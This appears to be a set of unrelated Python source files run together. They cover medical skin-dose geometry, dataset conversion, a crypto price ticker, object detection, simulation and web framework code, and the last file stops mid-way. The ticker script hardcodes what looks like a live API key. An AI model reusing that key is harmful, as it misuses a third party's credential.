positioned to the starting position for the procedure. This is done by
rotating and translating the patient, table and pad phantoms so that
the correct starting position is achieved. Currently, the patient is
assumed to lie in supine position. The effect of this positioning can be
displayed by running mode == "plot_setup" in main.py.
Parameters
----------
patient : Phantom
Patient phantom, either plane, cylinder or human.
table : Phantom
Table phantom to represent the patient support table
pad : Phantom
Pad phantom to represent the patient support pad
pad_thickness: Any
Patient support pad thickness
patient_offset : List[int]
Offsets the patient phantom from the centered along the head end of the
table top, given as [Tx: <int>, "Ty": <int>, "Tz": <int>] in cm.
patient_orientation : str
patient orientation upon table. Choose between
c.PATIENT_ORIENTATION_HEAD_FIRST_SUPINE and
c.PATIENT_ORIENTATION_FEET_FIRST_SUPINE.
"""
# rotate 90 deg about LON axis to get head end in positive LAT direction,
# i.e. in head first supine position.
table.rotate(angles=[90, 0, 0])
pad.rotate(angles=[90, 0, 0])
patient.rotate(angles=[90, 0, 0])
# if feet-first, rotate patient 180 degrees about y-axis
if patient_orientation == c.PATIENT_ORIENTATION_FEET_FIRST_SUPINE:
patient.rotate(angles=[0, 180, 0])
# translate to get origin centered along the head end of the table
table.translate(dr=[0, 0, -max(table.r[:, 2])])
pad.translate(dr=[0, 0, -max(pad.r[:, 2])])
patient.translate(dr=[0, 0, -max(patient.r[:, 2])])
# place phantom directly on top of the pad
patient.translate(dr=[0, -(max(patient.r[:, 1] + pad_thickness)), 0])
# offset patient 15 cm from head end
patient.translate(dr=patient_offset)
# Save reference table position:
table.save_position()
pad.save_position()
patient.save_position()
def vector(start: np.array, stop: np.array, normalization=False) -> np.array:
"""Create a vector between two points in carthesian space.
This function creates a simple vector between point <start> and point
<stop> The function can also create a unit vector from <start>, in the
direction to <stop>.
Parameters
----------
start : np.array
Starting point of the vector
stop : np.array
Stopping point of the vector
normalization : bool, optional
Toggle normalization (the default is False, which implies no
normalization)
Returns
-------
np.array
A vector from "start" to "stop", or if normalization=True, a unit
vector from "start" in the direction towards "stop".
"""
# Calculate vector from start to stop
vec = stop - start
# Normalize if requested
if normalization:
# Normalize vector
mag = np.sqrt(vec.dot(vec))
vec = vec / mag
return vec
def scale_field_area(data_norm: pd.DataFrame, event: int, patient: Phantom,
hits: List[bool], source: np.array) -> List[float]:
"""Scale X-ray field area from image detector, to phantom skin cells.
This function scales the X-ray field size from the point where it is stated
in data_norm, i.e. at the image detector plane, to the plane at the phantom
skin cell. This is the field size of interest since this area is required
as input for k_med and k_bs correction factor calculations. This function
conducts this scaling for all skin cells that are hit by the X-ray beam in
a specific irradiation event.
Parameters
----------
data_norm : pd.DataFrame
RDSR data, normalized for compliance with PySkinDose.
event : int
Irradiation event index.
patient : Phantom
Patient phantom, i.e. instance of class Phantom.
hits : List[bool]
A boolean list of the same length as the number of patient skin
cells. True for all entrance skin cells that are hit by the beam for a
specific irradiation event.
source : np.array
(x,y,z) coordinates to the X-ray source
Returns
-------
List[float]
X-ray field area in (cm^2) for each phantom skin cell that are hit by
X-ray the beam
"""
# Fetch reference distance for field size scaling,
# i.e. distance source to detector
d_ref = data_norm.DSD[event]
cells = patient.r[hits]
# Calculate distance scale factor
scale_factor = [np.linalg.norm(cell - source) / d_ref for cell in cells]
# Fetch field side lenth lateral and longitudinal at detector plane
# Fetch field area at image detector plane
field_area_ref = data_norm.FS_lat[event] * data_norm.FS_long[event]
# Calculate field area at distance source to skin cell for all cells
# that are hit by the beam.
field_area = [round(field_area_ref * np.square(scale), 1)
for scale in scale_factor]
return field_area
def fetch_and_append_hvl(data_norm: pd.DataFrame) -> pd.DataFrame:
"""Add event HVL to RDSR event data from database.
Parameters
----------
data_norm : pd.DataFrame
RDSR data, normalized for compliance with PySkinDose.
Returns
-------
data_norm
This function appends event specific HVL (mmAl) as a function of device
model, kVp, and copper- and aluminum filtration to the normalized RDSR
data in data_norm and returns the DataFrame with the HVL info appended.
"""
# Open connection to database
conn = db_connect()[0]
# Fetch entire HVL table
hvl_data = pd.read_sql_query("SELECT * FROM HVL_simulated", conn)
hvl = [float(hvl_data.loc[
(hvl_data['DeviceModel'] == data_norm.model[event]) &
(hvl_data['kVp_kV'] == round(data_norm.kVp[event])) &
(hvl_data['AddedFiltration_mmCu'] ==
data_norm.filter_thickness_Cu[event]), "HVL_mmAl"])
for event in range(len(data_norm))]
# Append HVL data to data_norm
data_norm["HVL"] = hvl
# close database connection
conn.commit()
conn.close()
return data_norm
def check_new_geometry(data_norm: pd.DataFrame) -> List[bool]:
"""Check which events has unchanged geometry since the event before.
This function is intented to calculate if new geometry parameters needs
to be calculated, i.e., new beam, geometry positioning, field area and
cell hit calculation.
Parameters
----------
data_norm : pd.DataFrame
RDSR data, normalized for compliance with PySkinDose.
Returns
-------
List[bool]
List of booleans where True[event] means that the event has updated
geometry since the preceding irradiation event.
"""
logger.info(
"Checking which irradiation events contain changes in geometry"
"compared to previous event")
logger.debug("Listing all RDSR geometry parameters")
geom_params = data_norm[['Tx', 'Ty', 'Tz', 'FS_lat', 'FS_long',
'Ap1', 'Ap2', 'Ap3', 'At1', 'At2', 'At3']]
logger.debug(
"Checking which irradiation events that does not have same"
"parameters as previous")
changed_geometry = [not geom_params.iloc[event].equals(
geom_params.iloc[event - 1]) for event in range(1, len(geom_params))]
logger.debug("Insert True to the first event to indicate that it has a"
"new geometry")
changed_geometry.insert(0, True)
return changed_geometry
class Triangle:
"""A class used to create triangles.
This class creates a triangle from a set of three coordinates in 3D
carthesian space. The purpose of this class is to use it to calculate if a
3D segment intercepts the triangle.
Attributes
----------
p: np.array
Carthesian 3D coordinates to the central vertex of the triangle
p1: np.array
Vector from p to first vertex
p2: np.array
Vector from p to second vertex
n: np.array
normal vector to the triangle, pointing upwards (negative y direction).
Methods
-------
check_intersection
check if a 3D segment intercepts with the triangle. For our
purpose, the 3D segment represents an X-ray beam from the X-ray
source to the phantom skin cell. If the beam intercepts, table- and
pad fluence correction should be conducted when calculating skin
dose for that particular cell. Please visit project documentation
(https://dev.azure.com/Sjukhusfysiker/PySkinDose/_wiki/) for a
clearer description and illustration for this method.
"""
def __init__(self, p: np.array, p1: np.array, p2: np.array):
"""Initialize class attributes."""
self.p = p
self.p1 = vector(self.p, p1)
self.p2 = vector(self.p, p2)
n = np.cross(self.p1, self.p2)
self.n = n/np.sqrt(n.dot(n))
def check_intersection(self, start: np.array,
stop: np.array) -> List[bool]:
"""Check if a 3D segment intercepts with the triangle.
Check if a 3D segment intercepts with the triangle. For our purpose,
the 3D segment represents an X-ray beam from the X-ray source to the
phantom skin cell and the triangle represent parts of the patient
support table. If the beam intercepts, table- and pad fluence
correction should be conducted when calculating skin dose for that
particular cell.
Parameters
----------
start : np.array
Carthesian 3D coordinates to the starting point of the segment.
stop : np.array
Carthesian 3D coordinates to the end points of the segment. Note,
can be several points, e.g, several skin cells.
Returns
-------
List[bool]
Boolean list which specifies whether each segment between start
and each of coordinates in stop are intercepted by the triangle.
"""
# Vector from source to central vertex
# w = vector(start, self.p)
w = self.p - start
# List of unit vectors from start, to each of the coordinates in stop.
v = ((stop - start).T /
np.linalg.norm(stop - start, axis=stop.ndim-1)).T
# Distances from start to the plane of the triangle, in the direction
# along the vector v.
k = (np.dot(w, self.n)) / (np.dot(v, self.n))
# Vector from origin to beam-table interceptions.
i = start + (k * v.T).T
# Vector from central vertex p to i
p_i = i - self.p
d = np.square(
np.dot(self.p1, self.p2)) - np.dot(self.p1, self.p1) * \
np.dot(self.p2, self.p2)
d1 = (np.dot(self.p1, self.p2) * np.dot(p_i, self.p2) -
np.dot(self.p2, self.p2) * np.dot(p_i, self.p1)) / d
d2 = (np.dot(self.p1, self.p2) * np.dot(p_i, self.p1) -
np.dot(self.p1, self.p1) * np.dot(p_i, self.p2)) / d
# Now we have p_i = d1/d * p1 + d2/d * p2, thus,
# if 0 <= d1/d <= 1, and 0 <= d2/d <= 1, and d1 + d2 <= 1, the beam
# intercepts the triangle.
hits = np.array([d1 >= 0, d1 <= 1,
d2 >= 0, d2 <= 1,
d1 + d2 <= 1]).all(axis=0)
return hits.tolist()
def check_table_hits(source: np.array, table: Phantom, beam,
cells: np.array) -> List[bool]:
"""Check which skin cells are blocket by the patient support table.
This fuctions creates two triangles covering the entire surface of the
patient support table, and checks if the skin cells are blocked by the
table. This is conducted in order to be able to append table and pad
correction factor k_(T+P) when required.
Parameters
----------
source : np.array
Carthesian 3D coordinates to the X-ray souce
table : Phantom
Patient support table, i.e., instance of class phantom with
phantom_type="table"
beam : Beam
X-ray beam, i.e., instance of class Beam.
cells : np.array
List of skin cells to be controlled if the patient support table and
pad blocks the beam before it reached the them.
Returns
-------
List[bool]
Boolean list of the statuses of each skin cell. True if the path from
X-ray source to skin cell is blocked by the table (any of the two
triangles), else false. Start points above triangle returns False,
to not include hits where the table does not block the beam.
"""
# Create triangles:
# Define edges of table (see illustration in project documentation)
a = table.r[6, :]
a1 = table.r[7, :]
a2 = table.r[5, :]
b = table.r[0, :]
b1 = table.r[5, :]
b2 = table.r[7, :]
# triangle spanning the "top right" part of the support table
# (viewed from above)
triangle_b_l = Triangle(p=a, p1=a1, p2=a2)
# triangle spanning the "bottom left" part of the support table
# (viewed from above)
triangle_t_r = Triangle(p=b, p1=b1, p2=b2)
# If over-table irradiation, return false for all points in cells
if np.dot(np.array([0, 0, 0]) - beam.r[0, :], triangle_b_l.n) < 0:
if cells.ndim == 1:
return [False]
return [False] * cells.shape[0]
# Check if beam vertices hits table on either of the triangles
hit_t_r = triangle_t_r.check_intersection(start=source, stop=beam.r[1:, :])
hit_b_l = triangle_b_l.check_intersection(start=source, stop=beam.r[1:, :])
# If all four beam verices hits the table, all cells are blocket by the
# table, and all cells should be corrected for table and pad attenuation.
if sum(hit_t_r + hit_b_l) == 4:
if cells.ndim == 1:
return [True]
return [True] * cells.shape[0]
# Else, check individually for all skin cells that are hit by the beam
hit_t_r = triangle_t_r.check_intersection(start=source, stop=cells)
hit_b_l = triangle_b_l.check_intersection(start=source, stop=cells)
hits = np.asarray([False] * len(cells))
# save results
hits[hit_t_r] = True
hits[hit_b_l] = True
return hits.tolist()
|
# Copyright (c) Facebook, Inc. and its affiliates.
# All rights reserved.
#
# This source code is licensed under the license found in the
# LICENSE file in the root directory of this source tree.
#
import json
import string
# The paths need to be updated
visdial_train_data_file = 'visdial_0.9_train.json'
visdial_val_data_file = 'visdial_0.9_val.json'
vdtrain_questions_file = 'v2_OpenEnded_mscoco_vdtrain_questions.json'
vdval_questions_file = 'v2_OpenEnded_mscoco_vdval_questions.json'
vdtrain_annotations_file = 'v2_mscoco_vdtrain_annotations.json'
vdval_annotations_file = 'v2_mscoco_vdval_annotations.json'
translator = str.maketrans('', '', string.punctuation)
vdtrain_questions = []
vdval_questions = []
vdtrain_annotations = []
vdval_annotations = []
with open(visdial_train_data_file, 'r') as f:
vdtrain_data = json.load(f)
vdtrain_data_questions = vdtrain_data['data']['questions']
vdtrain_data_answers = vdtrain_data['data']['answers']
vdtrain_dialogs = vdtrain_data['data']['dialogs']
count = 1
for dialogs in vdtrain_data['data']['dialogs']:
image_id = dialogs['image_id']
for dialog in dialogs['dialog']:
qid = dialog['question']
aid = dialog['answer']
q = vdtrain_data_questions[qid]
a = vdtrain_data_answers[aid]
question = {}
annotation = {}
question['image_id'] = image_id
question['question_id'] = count
question['question'] = q
vdtrain_questions.append(question)
a = a.translate(translator)
a = a.lower()
annotation['multiple_choice_answer'] = a
annotation['question_id'] = count
annotation['answers'] = []
for i in range(10):
answer = {}
answer['answer'] = a
answer['answer_confifence'] = 'yes'
answer['answer_id'] = i + 1
annotation['answers'].append(answer)
vdtrain_annotations.append(annotation)
count = count + 1
print("Total qa train " + str(count))
with open(visdial_val_data_file, 'r') as f:
vdval_data = json.load(f)
vdval_data_questions = vdval_data['data']['questions']
vdval_data_answers = vdval_data['data']['answers']
vdval_dialogs = vdval_data['data']['dialogs']
count = 1
for dialogs in vdval_data['data']['dialogs']:
image_id = dialogs['image_id']
for dialog in dialogs['dialog']:
qid = dialog['question']
aid = dialog['answer']
q = vdtrain_data_questions[qid]
a = vdtrain_data_answers[aid]
question = {}
annotation = {}
question['image_id'] = image_id
question['question_id'] = count
question['question'] = q
vdval_questions.append(question)
a = a.lower()
a = a.translate(translator)
annotation['multiple_choice_answer'] = a
annotation['question_id'] = count
annotation['answers'] = []
for i in range(10):
answer = {}
answer['answer'] = a
answer['answer_confifence'] = 'yes'
answer['answer_id'] = i + 1
annotation['answers'].append(answer)
vdval_annotations.append(annotation)
count = count + 1
print("Total qa val " + str(count))
vdtrain_data = {}
vdtrain_data['questions'] = vdtrain_questions
vdval_data = {}
vdval_data['questions'] = vdval_questions
with open(vdtrain_questions_file, 'w') as f:
json.dump(vdtrain_data, f)
with open(vdval_questions_file, 'w') as f:
json.dump(vdval_data, f)
vdtrain_data = {}
vdtrain_data['annotations'] = vdtrain_annotations
vdval_data = {}
vdval_data['annotations'] = vdval_annotations
with open(vdtrain_annotations_file, 'w') as f:
json.dump(vdtrain_data, f)
with open(vdval_annotations_file, 'w') as f:
json.dump(vdval_data, f)
|
#! /usr/bin/python
#-*-coding:utf-8-*-
import urllib.request
import json
import sys, time
import curses
import console_view as cv
class fetch_coinmarket(cv.console_view):
def __init__(self, x = 0, y = 0, width = 80, height = 15, is_view = True):
cv.console_view.__init__(self, x, y, width, height, is_view)
self.is_stop = False
self.num = 50
self.pos_y = 2
self.targetSymbol = ('BTC','ETH','XRP', 'BCH', 'LTC', 'DASH', 'USDT', 'DOGE')
#self.coin_url = "https://pro-api.coinmarketcap.com/v1/ticker/?limit=%d"%self.num
self.coin_url = "https://pro-api.coinmarketcap.com/v1/cryptocurrency/listings/latest"
def stop(self):
self.is_stop = True
curses.endwin()
print('stopped')
def start(self):
print(self.coin_url)
#self.stdscr = curses.initscr()
#self.stdscr = curses.initscr()
#self.stdscr = curses.newwin(15, 80, 0, 0)
self.stdscr = curses.newwin(self.display_pos['height'], self.display_pos['width'], self.display_pos['y'], self.display_pos['x'])
#self.stdscr = curses.newpad(600, 800)
curses.start_color()
curses.init_pair(1, curses.COLOR_GREEN, curses.COLOR_BLACK)
curses.init_pair(2, curses.COLOR_RED, curses.COLOR_BLACK)
curses.init_pair(3, curses.COLOR_YELLOW, curses.COLOR_BLACK)
while not self.is_stop:
cur_pos_x = 2;
headers = {
'Accepts': 'application/json',
'X-CMC_PRO_API_KEY': 'b22f9e6d-6c09-431d-ac9a-fd87131fc9a5',
}
req = urllib.request.Request(url=self.coin_url, headers=headers)
res = urllib.request.urlopen(req)
page = res.read()
json_obj = json.loads(page)
print(json_obj)
self.stdscr.box(curses.ACS_VLINE, curses.ACS_HLINE)
self.stdscr.addstr(cur_pos_x,self.pos_y,'Coin market cap', curses.color_pair(3))
cur_pos_x += 1;
self.stdscr.addstr(cur_pos_x,self.pos_y,time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(time.time()) ), curses.color_pair(3))
cur_pos_x += 1;
print_head = "Symbol \tPrice($) \tPercent(24h)"
self.stdscr.addstr(cur_pos_x,self.pos_y,print_head,curses.color_pair(3))
cur_pos_x += 1;
for i in range(self.num):
color_index = 1
if json_obj[i]['symbol'] in self.targetSymbol:
#print_content = "sym:%7s \tprice:%10s \tper:%5s"%(json_obj[i]['symbol'], json_obj[i]['price_usd'], json_obj[i]['percent_change_24h']);
print_content = "%7s \t%7s \t%7s"%(json_obj[i]['symbol'], json_obj[i]['price_usd'], json_obj[i]['percent_change_24h']);
if json_obj[i]['percent_change_24h'][0] == '-':
color_index = 2
self.stdscr.addstr(cur_pos_x,self.pos_y,print_content,curses.color_pair(color_index))
cur_pos_x += 1
#stdscr.addstr(i, 0, "hi:%d"%i)
#sys.stdout.flush()
self.stdscr.refresh()
time.sleep(10)
if __name__ == "__main__":
curses.initscr()
coin_market = fetch_coinmarket()
try:
coin_market.start()
except KeyboardInterrupt as e:
coin_market.stop()
|
"""
Trait for a Slot meant to contain an object of a particular type
or having a particular interface (either a Traits interface or a
zope.interface).
"""
# The regular Instance class that comes with Traits will only check public
# methods on an object if that object is not a HasTraits object, which means
# we get essentially no error checking for things like Case iterators where
# their API doesn't include any public methods. If we use zope.interface we
# don't have this problem.
#public symbols
__all__ = ["Slot"]
from inspect import isclass
# pylint: disable-msg=E0611,F0401
from enthought.traits.api import Instance, Interface
import zope.interface
from openmdao.main.variable import Variable, gui_excludes
from openmdao.main.mp_support import has_interface
from openmdao.main.interfaces import IContainer
class Slot(Variable):
"""A trait for an object of a particular type or implementing a particular
interface. Both Traits Interfaces and zope.interface.Interfaces are
supported.
"""
def __init__(self, klass=object, allow_none=True, factory=None,
args=None, kw=None, **metadata):
default_value = None
try:
iszopeiface = issubclass(klass, zope.interface.Interface)
except TypeError:
iszopeiface = False
if not isclass(klass):
default_value = klass
klass = klass.__class__
metadata.setdefault('copy', 'deep')
self._allow_none = allow_none
self.klass = klass
if has_interface(klass, IContainer) or (isclass(klass) and \
IContainer.implementedBy(klass)):
self._is_container = True
else:
self._is_container = False
if iszopeiface:
self._instance = None
self.factory = factory
self.args = args
self.kw = kw
else:
self._instance = Instance(klass=klass, allow_none=allow_none,
factory=factory, args=args, kw=kw,
**metadata)
if default_value:
self._instance.default_value = default_value
else:
default_value = self._instance.default_value
super(Slot, self).__init__(default_value, **metadata)
def validate(self, obj, name, value):
''' wrapper around Enthought validate method'''
if value is None:
if self._allow_none:
return value
self.validate_failed(obj, name, value)
if self._instance is None: # our iface is a zope.interface
if not self.klass.providedBy(value):
self._iface_error(obj, name, self.klass.__name__)
else:
try:
value = self._instance.validate(obj, name, value)
except Exception:
if issubclass(self._instance.klass, Interface):
self._iface_error(obj, name, self._instance.klass.__name__)
else:
obj.raise_exception("%s must be an instance of class '%s'" %
(name, self._instance.klass.__name__),
TypeError)
return value
def post_setattr(self, obj, name, value):
'''Containers must know their place within the hierarchy, so set their
parent here. This keeps side effects out of validate()'''
if self._is_container and value is not None:
if value.parent is not obj:
value.parent = obj
# VariableTrees also need to know their iotype
if hasattr(value, '_iotype'):
value._iotype = self.iotype
def _iface_error(self, obj, name, iface_name):
obj.raise_exception("%s must provide interface '%s'" %
(name, iface_name), TypeError)
def get_attribute(self, name, value, trait, meta):
"""Return the attribute dictionary for this variable. This dict is
used by the GUI to populate the edit UI. Slots also return an
attribute dictionary for the slot pane.
name: str
Name of variable
value: object
The value of the variable
trait: CTrait
The variable's trait
meta: dict
Dictionary of metadata for this variable
"""
io_attr = {}
io_attr['name'] = name
io_attr['type'] = trait.trait_type.klass.__name__
io_attr['ttype'] = 'slot'
slot_attr = {}
slot_attr['name'] = name
if value is None:
slot_attr['filled'] = None
elif value is []:
slot_attr['filled'] = []
else:
slot_attr['filled'] = type(value).__name__
slot_attr['klass'] = io_attr['type']
slot_attr['containertype'] = 'singleton'
for field in meta:
if field not in gui_excludes:
slot_attr[field] = meta[field]
return io_attr, slot_attr
|
import os
import sys
import multiprocessing
import argparse
import torch
import torchvision.transforms as transforms
import numpy as np
import resnet_backbone
from bbox_tr import plot_bbox
from matplotlib import pyplot as plt
from PIL import Image
from TRD import TRD
from polynms import nms_poly
def predit_image(net,
device,
transform,
img_path,
overlap,
score_thresh,
iou_thresh,
cd_thresh,
show=False,
save=True):
image = Image.open(img_path)
net.eval()
with torch.no_grad():
pred = net.bigdetect(image,
transform,
overlap,
score_thresh=score_thresh,
iou_thresh=iou_thresh,
cd_thresh=cd_thresh,
device=device)
if pred is not None:
if(show):
plot_bbox(np.asarray(image), pred, scores=pred[:,7], labels=pred[:,6])
plt.show()
if(save):
image_id,_ = os.path.splitext(img_path)
lbl_file = open(image_id+'.txt', 'w')
for _, bbox in enumerate(pred):
lbl_file.write(
str(int(bbox[6])) + " "
+ " ".join(['%.7f'%a for a in bbox[:4]]) + " "
+ str(int(bbox[4])) + " "
+ '%.7f'%bbox[5] + " "
+ '%.7f'%bbox[7] + '\n')
lbl_file.close()
def get_args():
parser = argparse.ArgumentParser(description='Predict Objects by TRD on input image or dir',
formatter_class=argparse.ArgumentDefaultsHelpFormatter)
parser.add_argument('-m', '--model', metavar='M', type=str, default=r"E:\SourceCode\Python\pytorch_test\resnet50-19c8e357.pth",
help='TRD model path', dest='model')
parser.add_argument('-i', '--input', metavar='IN', type=str, default=r'D:\cvImageSamples\lan4\test\四尾栅藻 (4).JPG',
help='Filename or dir of input images',dest='image_path')
parser.add_argument('-iz', '--image-size', metavar='IZ', type=int, default=416,
help='Network input image size', dest='image_size')
parser.add_argument('-ie', '--image-ext', metavar='IE', type=str, default='.bmp',
help='Image extension name, must provided when input path is dir', dest='image_ext')
parser.add_argument('-o', '--overlap', metavar='O', type=int, default=172,
help='Overlap of spliting image to fit network input', dest='overlap')
parser.add_argument('-c', '--num-classes', metavar='C', type=int, default=1,
help='Number of classes', dest='num_classes')
parser.add_argument('-st', '--score-thresh', metavar='ST', type=float, default=0.51,
help='Score threshold', dest='score_thresh')
parser.add_argument('-it', '--iou-thresh', metavar='IT', type=float, default=0.3,
help='IOU threshold', dest='iou_thresh')
parser.add_argument('-ct', '--cen-dis-thresh', metavar='CT', type=float, default=0.1,
help='Box center distance threshold', dest='cd_thresh')
return parser.parse_args()
if __name__ == '__main__':
torch.multiprocessing.freeze_support()
args = get_args()
bboxw_range = [(48,144),(24,72),(12,36)]
net = TRD(bboxw_range,args.image_size,args.num_classes)
device = torch.device("cuda:0" if torch.cuda.is_available() else "cpu")
# 加载预训练的resnet参数
pretrained_dict = torch.load(args.model)
model_dict = net.state_dict()
#将pretrained_dict里不属于model_dict的键剔除掉
pretrained_dict = {k: v for k, v in pretrained_dict.items() if k in model_dict}
# 更新现有的model_dict
model_dict.update(pretrained_dict)
# 加载我们真正需要的state_dict
net.load_state_dict(model_dict)
# net.load_state_dict(torch.load(args.model))
net.to(device)
transform = transforms.Compose([
transforms.ToTensor()])
if(os.path.isfile(args.image_path)):
predit_image(net,
device,
transform,
args.image_path,
args.overlap,
score_thresh=args.score_thresh,
iou_thresh=args.iou_thresh,
cd_thresh=args.cd_thresh,
show=True,
save=True)
elif (os.path.isdir(args.image_path)):
for i in os.listdir(args.image_path):
image_id,image_ext = os.path.splitext(i)
if image_ext.lower() == args.image_ext:
image_path = os.path.join(args.image_path,i)
predit_image(net,
device,
transform,
image_path,
args.overlap,
score_thresh=args.score_thresh,
iou_thresh=args.iou_thresh,
cd_thresh=args.cd_thresh,
show=False,
save=True)
|
from vpython import*
import numpy as np
import sys
sys.path.append(".")
import grow
from grow import *
import matplotlib.pyplot as plt
import time
scene2 = canvas(title='Simulation System', width=800, height=700, center=vector(0,0,0),
background=color.white)
#target
ball_position = vector(3,3,1)#vector(-4,-2,0)
ball_radius = 1
ball = sphere(pos=ball_position, radius=ball_radius, color = color.white) #(vec(246/255, 177/255, 76/255))
rod = cylinder(pos=ball_position, axis=vector(-3,-1,2), radius=ball_radius, color =color.white)
end_ball_position = rod.pos+rod.axis
end_ball = sphere(pos=end_ball_position, radius=ball_radius, color = color.white)# vec(246/255, 177/255, 76/255))
bottom_plane = box(pos=vec(0,0,-0.2),axis = vec(1,0,0), length=20, height=0.1, width=20,color = vec(180/255,180/255,180/255), up=vec(0,0,1))
#background1 = box(pos=vec(0,100,0),axis = vec(0,0,1), length=20, height=0.1, width=20,color = vec(180/255,180/255,180/255),texture = "sky.jpg")#'D:/Santanna/3D Grow/sky.jpg')
# plat initial
spr_dis = np.sqrt(3)/2*0.5
spr_len = 0.6
test = grow.Cell(Spr_distance = spr_dis, Spr_len = spr_len)
# light
lamp1 = local_light(pos=vec(100,100,-100), color=color.white*0.2)
lamp2 = local_light(pos=vec(100,-100,-100), color=color.white*0.2)
lamp3 = local_light(pos=vec(-100,-100,100), color=color.white*0.2)
lamp4 = local_light(pos=vec(100,-100,100), color=color.white*0.2)
#light2 = distant_light(direction=vector(100,100,100), color=color.white*0.2)
scene2.camera.up = vec(0,0,1)
scene2.camera.pos = vec(-6.60371, 1.34283, 2.26781) #(-4.21826, -6.77872, 2.1207)
scene2.camera.axis = vec(6.60371, -1.34283, -2.26781) #(4.21826, 6.77872, -2.1207)
time.sleep(5)
t=0
delt = 0.1
dt=spr_len*delt
dt_L = spr_len*delt
rate(200)
####################### reaching part ################################
#res = Grow_toward_one_target(test,steplenght = dt, ball_pos = ball_position, ball_rad = ball_radius)
#dis_list = test.Distance_from_top_to_target( ball_pos = ball_position, ball_rad = ball_radius)
res = Grow_toward_one_target(test, steplenght = dt,rod_pos = rod.pos, rod_axis = rod.axis, rod_rad = rod.radius)
dis_list = test.Distance_from_top_to_target(rod_pos = rod.pos, rod_axis = rod.axis, rod_rad = rod.radius)
min_dist = min(dis_list)
while (min_dist> spr_dis*2/np.sqrt(3) *1):
#res = Grow_toward_one_target(test, steplenght = dt, ball_pos = ball_position, ball_rad = ball_radius)
#dis_list = test.Distance_from_top_to_target(ball_pos = ball_position,ball_rad = ball_radius)
res = Grow_toward_one_target(test, steplenght = dt,rod_pos = rod.pos, rod_axis = rod.axis, rod_rad = rod.radius)
dis_list = test.Distance_from_top_to_target(rod_pos = rod.pos, rod_axis = rod.axis, rod_rad = rod.radius)
min_dist = min(dis_list)
if res == 0:
test.add_one_layer_on_top()
res = 1
###########################################################################
#dis = test.Distance_from_top_to_rod_shape(test, steplenght = dt, rod_pos = rod.pos, rod_axis = rod.axis, rod_rad = rod.radius )
Prepare_for_grasping(test, steplenght = dt, rod_pos = rod.pos, rod_axis = rod.axis, rod_rad = rod.radius )
Grow_coiling(test, steplenght = dt, rod_pos = rod.pos, rod_axis = rod.axis, rod_rad = rod.radius )
#Grow_climbing(test, steplenght = dt, rod_pos = rod.pos, rod_axis = rod.axis, rod_rad = rod.radius )
print("end")
|
# -*- coding: utf-8 -*-
#
# Copyright (C) 2020 CERN.
#
# Invenio-Records-Resources is free software; you can redistribute it and/or
# modify it under the terms of the MIT License; see LICENSE file for more
# details.
"""Facets parameter interpreter API."""
from .base import ParamInterpreter
class FacetsParam(ParamInterpreter):
"""Evaluate facets."""
def iter_facet_args(self, params):
"""Iterate over all possible facet arguments."""
return {
k: v if type(v) is list else [v] for k, v in (params or {}).items()
}.items()
def iter_aggs_options(self, options):
"""Iterate over aggregation options."""
return options.get("aggs", {}).items()
def apply(self, identity, search, params):
"""Evaluate the query str on the search."""
options = self.config.search_facets_options
# Apply aggregations
for name, agg in self.iter_aggs_options(options):
# `aggs[]=` mutates `self.search`
search.aggs[name] = agg if not callable(agg) else agg()
# Apply post filters
post_filters = options.get("post_filters", {})
for name, facet_values in self.iter_facet_args(params):
filter_factory = post_filters.get(name)
if facet_values and filter_factory:
search = search.post_filter(filter_factory(facet_values))
return search
|
import json
import os
import sys
import argparse
parser = argparse.ArgumentParser(description='Process JSON config file.')
parser.add_argument('target', type=str, help='NER or KB target to set')
args = parser.parse_args()
with open('config.json', 'r') as f:
config = json.load(f)
ner_entries = []
kb_entries = []
for topic in config:
ner_entry = topic['name'] + '=' + topic['ner_model']
ner_entries.append(ner_entry)
kb_entry = topic['name'] + '=' + topic['kb_file']
kb_entries.append(kb_entry)
if args.target == 'ner':
print(','.join(ner_entries).replace('/', '\/'))
else:
print(','.join(kb_entries).replace('/', '\/'))
|
#!/usr/bin/python -tOO
import sys
if len(sys.argv) != 4 :
print 'Usage : %s <interval (seconds)> <bsgfile> <tracefile> ' % sys.argv[0]
sys.exit(1)
stopat = 4752000
interval = int(sys.argv[1])
bsgfile = sys.argv[2]
trace = sys.argv[3]
keysize = 16
trustedgroupsize = 10
completionfile = '../completion.%d.dat' % interval
print '''
all:
\trm -rf peerdata *.log
\t../testprotocol2 %s %s %d %d %d %d
\t../gather_log_info/completion.py authentication.log > %s \n\n''' % (bsgfile,
trace,
trustedgroupsize,
keysize,
interval,
stopat,
completionfile)
|
# this file shows how you could use load_extension to add games
# to your bot
# first, we make the bot
from discord.ext import commands
bot = commands.Bot("!") # Here, ! is the prefix
bot.load_extension("disgames")
# this would add a "Games" cog to your bot with all the games in it
|
from compas.datastructures import Network
from compas_plotters import Plotter
n = Network()
n.add_edge(1, 2)
n.add_edge(1, 3)
n.add_edge(1, 5)
n.add_edge(1, 7)
n.add_edge(2, 4)
n.add_edge(2, 6)
n.add_edge(2, 10)
n.add_edge(3, 6)
n.add_edge(3, 9)
n.add_edge(4, 8)
n.add_edge(5, 10)
print(n.summary())
visited = set()
def layout(node, y=1):
if node in visited:
return
visited.add(node)
nodes_in_row = list(n.nodes_where({"y": y}))
n.node_attributes(node, "xyz", [len(nodes_in_row), y, 0])
for nb in n.neighbors_out(node):
layout(nb, y + 1)
root = 1
layout(root)
plotter = Plotter(figsize=(12, 7.5))
artist = plotter.add(n)
artist.node_size = 2
# Workaround until this is merged: https://github.com/compas-dev/compas/pull/1029
artist._nodecollection.remove()
artist._edgecollection.remove()
artist._nodecollection = None
artist._edgecollection = None
artist.draw()
artist.draw_nodelabels(dict(zip(n.nodes(), n.nodes())))
plotter.zoom_extents()
plotter.show()
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
import mock
import unittest
import undelete as D
class HDXConnectionTest(unittest.TestCase):
'''Unit tests for checking the connection with HDX.'''
def test_connection_with_hdx(self):
a = "xxx"
b = "yyy"
assert D.collectDatasetDataFromHDX(dataset_id = a, apikey = b) == False
|
from __future__ import print_function, unicode_literals
import inspect
from rest_framework.exceptions import ValidationError
from rest_framework.fields import SkipField
from rest_framework.serializers import ListSerializer
from rest_framework.settings import api_settings
from rest_framework.utils import html
__all__ = [
'BulkListSerializer',
'BulkSerializerMixin',
]
class BulkSerializerMixin(object):
def to_internal_value(self, data):
ret = super(BulkSerializerMixin, self).to_internal_value(data)
id_attr = getattr(self.Meta, 'update_lookup_field', 'id')
request_method = getattr(self.context['request'], 'method', '')
# add update_lookup_field field back to validated data
